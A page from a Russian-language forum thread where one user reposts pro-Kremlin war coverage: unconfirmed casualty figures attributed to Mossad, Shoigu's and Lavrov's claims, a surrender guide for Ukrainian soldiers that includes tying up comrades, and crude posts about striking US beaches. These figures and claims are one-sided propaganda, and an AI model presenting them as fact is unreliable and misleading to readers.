08 ФЕВРАЛЯ 2023 12:02

Данные о потерях опубликовало турецкое издание со ссылкой на Моссад.

Турецкое издание Hurseda haber со ссылкой на некие источники в израильской разведке Моссад опубликовало данные о потерях Украины и России в ходе конфликта.

Потери Украины
Итак, по данным неназванного источника за 14 января, потери Украины при общей численности вооруженных сил, задействованных в конфликте, в 734 тысячи солдат и офицеров, плюс 100 тысяч резервистов, оценивались следующим образом:

302 самолета,

212 вертолетов,

2750 БПЛА,

6320 танков и другой бронетехники,

7360 артсистем,

497 ЗРК.

Напомним, 14 января Министерство обороны России давало такие данные по уничтоженной технике ВСУ:

372 самолета, 200 вертолетов, 2880 беспилотных летательных аппаратов, 400 зенитных ракетных комплексов, 7511 танков и других боевых бронированных машин, 982 боевые машины реактивных систем залпового огня, 3828 орудий полевой артиллерии и минометов, а также 8040 единиц специальной военной автомобильной техники.

С учетом возможной разницы в классификации, а также, с учетом поправки на боевые условия, данные Минобороны России довольно точно соответствуют данным израильской разведки.

Теперь человеческие потери. С начала конфликта Моссад насчитал у Украины 157 тысяч убитых, 234 тысячи раненых, 17230 человек – в плену.

Кроме того, к потерям Украины отнесены 234 военных инструктора НАТО, 2456 погибших солдат НАТО и 5360 наемников. Более чем три полноценных полка иностранцев.

Потери России
Моссад, если верить турецкому источнику, оценивал наши потери в середине января так... В конфликте были задействованы 418 тысяч солдат и ЧВК "Вагнер", численность которой источник не указал.

Потери на середину января с начала конфликта составили:

23 самолета,

56 вертолетов,

200 БПЛА,

889 танков и бронемашин,

427 артсистемы,

12 ЗРК,

18 480 погибших, 44 500 раненых, 323 – в плену.

Достоверность этих данных никем не подтверждена, - еще раз уточняем.

Потери 10 к 1
Однако, тенденция очевидна. Даже с учетом лояльного отношения Израиля к «партнерам» на Украине, этот источник оценивает потери украинской стороны примерно 10 к 1 по отношению к потерям России, несмотря на активнейшую поддержку со стороны НАТО. При таком раскладе поражение ВСУ неизбежно.

Что касается достоверности цифр «от Моссад» по потерям России. Официальных данных по нашим потерям в ходе СВО, Министерство обороны России, напомним, сейчас не дает.

Тем временем, данные генштаба ВСУ о потерях русской армии носят исключительно пропагандистский характер и примерно на порядок (в десять раз) выше тех, что распространила израильская разведка. Так, по версии генералитета ВСУ, они сбили уже 295 самолетов и 285 вертолетов ВКС России.

https://www.rbc.ru/politics/19/12/2023/658179429a7947f688f503b2
Шойгу назвал потери украинской армии с начала военной операции
Военная операция на Украине , 19 дек 2023, 14:09 85 649

Шойгу: потери ВСУ с начала военной операции составили 383 тыс. человек

Глава военного ведомства рассказал, что потери ВСУ превысили 380 тыс., более 40% — с начала контрнаступления

С начала специальной военной операции потери украинской армии составили 383 тыс. убитыми и ранеными. Об этом на коллегии Министерства обороны сообщил глава ведомства Сергей Шойгу.

По его словам, только с начала контрнаступления в июне украинские подразделения потеряли 159 тыс. человек и при этом не смогли преодолеть тактическую зону обороны российской армии. Как отметил Шойгу, с начала конфликта Украина провела уже девять волн мобилизации, а сейчас проводит десятую, привлекая на службу в том числе ограниченно годных.

Большие потери, по словам министра, понесли и иностранные наемники, которые воюют на стороне ВСУ. В общей сложности потери среди них достигли 5800 человек. Большинство приехавших из-за рубежа — граждане Польши, США и Великобритании.

Также Шойгу рассказал, что в общей сложности Запад поставил Украине 5220 танков и другой бронетехники, 1300 артиллерийских систем, более 2,5 млн снарядов. По словам российского министра, управляют комплексами ПВО и РСЗО военнослужащие из стран НАТО. «При подготовке ударов этими средствами в радиоперехватах фиксируем американскую, польскую и речь англичан», — заявил он.

Что касается потерь военной техники, то с июня ВСУ потеряли 766 танков (в том числе 37 Leopard), более 2300 других бронемашин (включая 50 Bradley).

Ранее Владимир Путин заявлял, что танки Leopard «прекрасно горят» на Украине, а поставки новых вооружений не смогут изменить ход спецоперации. На сегодняшней коллегии глава государства сказал, что спецоперация «разрушила миф о неуязвимости западной военной техники».













Инструкция для военнослужащих Украины, которые хотят сдаться в плен и выжить:

воспользуйтесь чат ботами телеграм-каналов военнослужащих РФ, которым доверяете. Не используйте радиосвязь!

если вы приняли решение сдаться в плен, в первую очередь определите, есть ли ещё желающие сдаться в вашем подразделении.
Если таковые имеются, желательно объединиться с ними, так ваши шансы выше.Определите, кто в вашем подразделении является идейным националистом, агентом военной контрразведки СБУ или лицом, которое по иным причинам не будет сдаваться в плен. Эти люди попытаются помешать вам сдаться, если узнают о вашем намерении. Не допускайте этого.

если командир вашего подразделения разделяет ваше намерение, обсудите с ним возможность сдачи подразделением в полном составе.

в день сдачи все лица, которые могут попытаться помешать вам и/или сообщить о вашем намерении должны быть нейтрализованы (то есть связаны, лишены способов связи и изолированы в отдельном помещении.).
Если рядом с вашими позициями есть позиции националистов из нацбатальонов, выбирайте маршрут движения в обход их позиции и в обход линий их видимости.
Кроме того, в день сдачи соседние подразделения не должны знать о вашем намерении. Вам необходимо предпринять меры для того, чтобы ваш уход с позиций не был замечен соседними подразделениями.
Выходя с позиций, не берите с собой тяжелую технику, только личное оружие. Не приближайтесь к позициям ВС РФ на технике.

влюбом случае, при обсуждении сдачи, сообщите военнослужащим РФ
- место, в котором вы будете переходить линию боевого соприкосновения:
- количество сдающихся;
- название подразделения;
- условные знаки, которыми вы обозначите свое перемещение для того, чтобы исключить поражение вас ВС РФ.
Если вы собираетесь сдаваться один и/или вместе с небольшим количеством людей, убедитесь, что никто не знает о вашем намерении.
Удобнее всего осуществлять сдачу, когда вы находитесь в охранении в одиночку, на дежурстве или в любой другой момент, в который вы можете покинуть расположение вашего подразделения незаметно.

при приближении к позициям ВС РФ:
- отсоедините магазин от своего оружия;
- повесьте оружие на левое плечо стволом вниз
- поднимите руки и медленно приближайтесь к позициям ВС РФ;
- если есть возможность, поднимите в руке кусок белой ткани, платок, белый лист бумаги и т.п.
Военнослужащие Вооруженных Сил Российской Федерации знают эти условные знаки, являющиеся свидетельством вашего мирного намерения!

Российская Федерация гарантирует жизнь всем сдавшимся в плен военнослужащим Украины и других силовых структур!

==========
https://dzen.ru/a/ZMpQ0jxovDRpWbqY
Вызывай «Волгу» и живи. На СВО создана частота для сдачи в плен солдат ВСУ
2 августа 2023

Все дежурные российские связисты предупреждены, что на волне 149.200 с ними могут связаться украинские солдаты, пожелавшие сдаться в плен.
Казалось, после того, что мы видели и слышали об отношении к российским солдатам, оказавшимся в украинском плену, слово «милосердие» должно быть вычеркнуто из нашего лексикона. Но не так устроен русский человек. Даже во враге, поверженном враге, он пытается отыскать человеческие черты. Помните, как у Толстого в «Войне и мир», когда солдаты кормят пленных французов, один русских рядовых говорит о пленных: «Они же люди...»

«Никто вам зла не причинит...»
С такими словами обращается российская армия к украинским бойцам в социальных сетях: «Украинцы, если вы хотите жить, если хотите вернуться к своим и близким, настройтесь на любом "Баофенге" на частоту 149.200 и вызывайте "Волгу". Кто не в курсе, то "Волга" — это универсальный позывной, на который можно выходить в открытом эфире и договариваться о безопасном коридоре для сдачи в плен. А "Баофенг" — портативная китайская рация Baofeng или любая другая рация, которые широко распространены по обе стороны линии соприкосновения, по ним можно связаться с российской стороной».

Коридор сдачи гарантировано безопасен
Все дежурные российские связисты предупреждены, что на волне 149.200 с ними могут связаться украинские солдаты, пожелавшие сдаться в плен. Дальше все по команде: телефонист докладывает командиру, а командир принимает решение, где и когда организовать безопасный коридор, и согласовывает свои действия с соседними подразделениями во избежание «дружественного огня».

Особое предупреждение наши военные передают силам украинских РЭБ, чтобы те не пытались глушить частоту 149.200: «Любой экипаж, который решит, что в их стране еще недостаточно умерло мужиков, и будет пытаться глушить данную гуманитарную частоту, будет найден и отправлен к бандере».

Они выбирают жизнь
Как сообщает в своем Telegram-канале врио главы Запорожской области Евгений Балицкий, на запорожском направлении предложением российской стороны воспользовались уже несколько групп военнослужащих ВСУ. Telegram-канал «Два майора» рассказал, что недавно с «Волгой» связалось два взвода ВСУ на Артемовском направлении. Они договорились с российским командованием, на рассвете вышли в условленное место и сложили оружие. Почти 60 человек вернутся домой к своим семьям, когда режим Зеленского рухнет под русским натиском. «Мы больше не смогли терпеть постоянного страха от ваших бомбежек, — сообщил один из сдавшихся в плен с этой партией. — После каждого артобстрела становилось все больше "двухсотых" и "трехсотых", аптечки у нас кончились, и раненые просто умирали. Мы решили сдаться и вызвали "Волгу"».

Сдался сам и привез полный грузовик ПЗРК
На днях на позиции наших войск выехал армейский украинский грузовик. Боевое охранение вело его на прицеле, но огня не открывало. Поняв, что «серая зона» позади, из машины вышел солдат ВСУ с поднятыми руками. После досмотра украинец рассказал свою историю: «Боец 54-й механизированной бригады зенитного дивизиона. Взвод радиолокационной разведки. Рядовой Тищенко Максим Сергеевич, год рождения 1981-й, город Рубежное Луганской области». На вопросы о мотивах сдачи в плен рассказывал откровенно, не пряча глаза.

— В какой момент вы решили перейти на российскую сторону?

— С момента, как только меня призвали. Но сделать этого не мог, так как нас отправили во Львов. Уже оказавшись на передовой, я подобрал русскую листовку, предлагающую переходить на сторону Российской Федерации. Я её сохранил, а в удобный момент связался по QR-коду и вышел на Telegram-канал, там мне рассказали, как это сделать. Подготовили безопасный коридор, и я вышел».

«Пусть живут»
Так говорят наши солдаты о пленных украинцах. Россиян, сражающихся с нацизмом на Украине, объединяет не только глубокий патриотизм, верность долгу и присяге, стойкость и храбрость, но и глубокая человечность. Радиочастота 149.200 и позывной «Волга», созданные российской армией для украинских солдат, понявших бесполезность защиты режима «киевского мясника», говорят о том, что украинцы для нас ещё люди...

Больше срочных и эксклюзивных новостей — в телеграм-канале АиФ
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 9:43
По аналогии как понедельник в Православной Церкви считается Днём Ангела, я предлагаю каждый понедельник устраивать "День Ангела-Хранителя" - когда любой военнослужащий может дойти с оружием до расстояния рукопашной схватки и сдаться
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 10:17
Как США обстреливали Россию ракетами ВСУ, так чтобы по всему миру США обстреливали оружием России
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 10:28
Янки, как вам такой симметричный ответ?
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 10:51
https://www.vedomosti.ru/politics/articles/2024/07/07/1048503-kakim-mozhet-bit-otvet-rossii?utm_source=smi2&utm_medium=partner&utm_campaign=7096&utm_content=14651150&utm_term=46252
Каким может быть ответ России на участие США в наведении ракет ВСУ
38 минут назад / Политика

Лавров пообещал, что Москва примет меры в обозримом будущем
Филипп Иванов
Алексей Никольский

Украина не смогла бы никуда запустить поставляемые американцами ракеты без помощи США, ответ России стоит ждать в обозримом будущем, заявил министр иностранных дел России Сергей Лавров в интервью журналисту Павлу Зарубину.

«Что касается нашей реакции, президент сказал, что мы будем реагировать, и я убежден, что в обозримом будущем вы об этом узнаете», – сказал Лавров, не приведя дополнительных подробностей.

Министр прокомментировал сообщения о том, что США несут ответственность за удары Украины по российским регионам, в том числе Севастополю. Заявления США и НАТО о том, что они не ведут войну с Россией, – плохая мина при плохой игре, сказал министр. По его словам, любой разбирающийся в военном деле человек понимает, что без прямого участия США «в целенаведении, в подготовке данных со спутников эти ракеты никуда бы не полетели».

23 июня ВСУ обстреляли Севастополь ракетами ATACMS, которые Украине поставляют США. Четыре снаряда удалось сбить, но боевая часть еще одной ракеты подорвалась в воздухе. Ее обломки упали в районе городского пляжа. Погибли четыре человека, в том числе двое детей, еще 153 получили ранения. Ответственность за атаку Минобороны России возложило на США и Украину, поскольку применение такого оружия невозможно без участия американских военных специалистов. Лавров на следующий день заявил, что Штаты причастны к теракту в Севастополе.

12 июня генсек НАТО Йенс Столтенберг сообщил, поставки оружия Украине будут обязательными для стран – членов альянса. Через неделю президент Владимир Путин на пресс-конференции во Вьетнаме заявил, что в ответ на такие решения Москва не исключает поставок вооружений в другие страны.

По мнению директора Центра военно-политических исследований МГИМО Алексея Подберезкина, ответ России на участие США в наведении поставленных Украине ракет может быть не зеркальным, а направленным на поддержку сил, которые противостоят западным правительствам в разных частях света. Он отметил, что Россия обладает огромными ресурсами как в военно-технической, так и в финансовой сфере для того, чтобы заниматься такой деятельностью.

«Вариантов ответа здесь очень много, главное, чтобы были приняты соответствующие решения. Речь идет не только о поддержке хуситов или подобных им сил. Во многих странах Европы есть силы, которые выступают за независимость, – в Ирландии, Шотландии, Каталонии и др. В Африке такая работа уже ведется. На мой взгляд, поддержка таких сил стала бы крайне эффективным способом противодействия коллективному Западу, все необходимые ресурсы для этого имеются», – сказал Подберезкин.

Военный эксперт Иван Коновалов полагает, что ответной мерой со стороны Вооруженных сил России станет воздействие на беспилотные летательные аппараты США и их союзников, которые могут принимать участие в наведении украинских ракет и сборе разведданных в интересах Украины. Таких способов, причем законных, достаточно, считает он. Кроме того, подчеркнул Коновалов, подобные шаги не приведут к гибели личного состава ВС США.
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 11:09
текст 01

https://www.kommersant.ru/doc/6819680
Лавров обещал скорый ответ на помощь США Украине в наведении ракет
07.07.2024, 15:57

Лавров: без помощи США ракеты Украины не достигли бы российских регионов
Министр иностранных дел РФ Сергей Лавров заявил, что ВСУ не смогли бы атаковать российские регионы без прямой помощи американских специалистов. По его словам, об ответе Москвы Вашингтону станет известно «в обозримом будущем».

«Без прямого участия Соединенных Штатов в целенаведении, в подготовке данных со спутников эти ракеты никуда бы не полетели... Что касается нашей реакции, президент сказал, что мы будем реагировать, и я убежден, что в обозримом будущем вы об этом узнаете»,— сообщил глава МИДа в разговоре с журналистом ВГТРК Павлом Зарубиным (запись опубликована в Telegram-канале).

Как отметил Сергей Лавров, страны НАТО, в том числе США, продолжают говорить, что они не воюют с Россией. По словам министра, это «плохая мина при плохой игре». В вопросе урегулирования конфликта на территории Украины, как добавил господин Лавров, Москва оценивает только конкретные действия Киева.

23 июня в результате атаки ВСУ по Севастополю погибли четыре человека, более 150 пострадали. Минобороны сообщало, что со стороны Украины было выпущено пять американских ракет ATACMS, четыре из которых сбили системы ПВО. У еще одной произошел подрыв осколочной боевой части над севастопольским пляжем. Ответственность за атаку Минобороны возложило на США. В Вашингтоне заявляли, что пляжи Севастополя не были целью ударов.

текст 01
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 11:34
Изменено: 07 июл 24 11:35
мы бы бля по пляжу в Калифорнии ракетой бы шарахнули, америкосы бы давно бы на гавно извелись
а по пляжу в Крыму можно США ракетой стрелять
[Ответ][Цитата]
 Стр.315 (429)1  ...  311  312  313  314  [315]  316  317  318  319  ...  429<< < Пред. | След. > >>